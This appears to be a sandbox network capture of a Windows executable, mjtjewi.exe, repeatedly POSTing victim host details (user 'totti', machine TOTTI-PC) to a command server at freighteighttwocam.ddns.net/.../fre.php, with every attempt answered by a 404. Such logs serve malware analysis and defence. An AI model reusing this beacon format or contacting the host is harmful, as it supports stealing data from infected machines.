Oct 3, 2024 09:21:12.112320900 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:12.880244970 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.11	64366	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:13.046875954 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:13.055507898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:13.766148090 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.11	64367	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:13.911133051 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:13.916853905 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:14.575090885 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.11	64368	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:14.876427889 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:14.881237984 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:15.898722887 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.11	64369	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:16.055149078 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:16.059968948 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:16.915457964 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.11	64370	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:17.076250076 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:17.083632946 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:17.866369963 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.11	64371	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:18.018455029 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:18.023488045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:19.008034945 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.11	64372	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:19.169938087 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:19.175709009 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:21.428244114 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.11	64373	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:21.587904930 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:21.592823982 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:22.234579086 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.11	64374	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:22.381572008 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:22.386914968 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:23.090107918 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.11	64375	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:23.241945982 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:23.246841908 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:23.948323011 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.11	64376	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:24.099610090 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:24.104473114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:24.875488997 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.11	64378	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:25.024096966 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:25.029227972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:25.669203997 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.11	64379	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:25.815433979 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:25.820374966 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:26.688807011 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.11	64380	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:26.846657991 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:26.851586103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:27.634349108 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.11	64381	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:27.805084944 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:27.810226917 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:28.548094988 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.11	64382	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:28.692899942 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:28.697925091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:29.432213068 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.11	64383	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:29.586962938 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:29.591806889 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:30.259722948 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.11	64384	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:30.408480883 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:30.413511038 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:31.213476896 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.11	64385	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:31.493468046 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:31.498785019 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:32.591485977 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:32.591620922 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.11	64386	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:32.738049984 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:32.743030071 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:33.386100054 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.11	64387	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:33.551290035 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
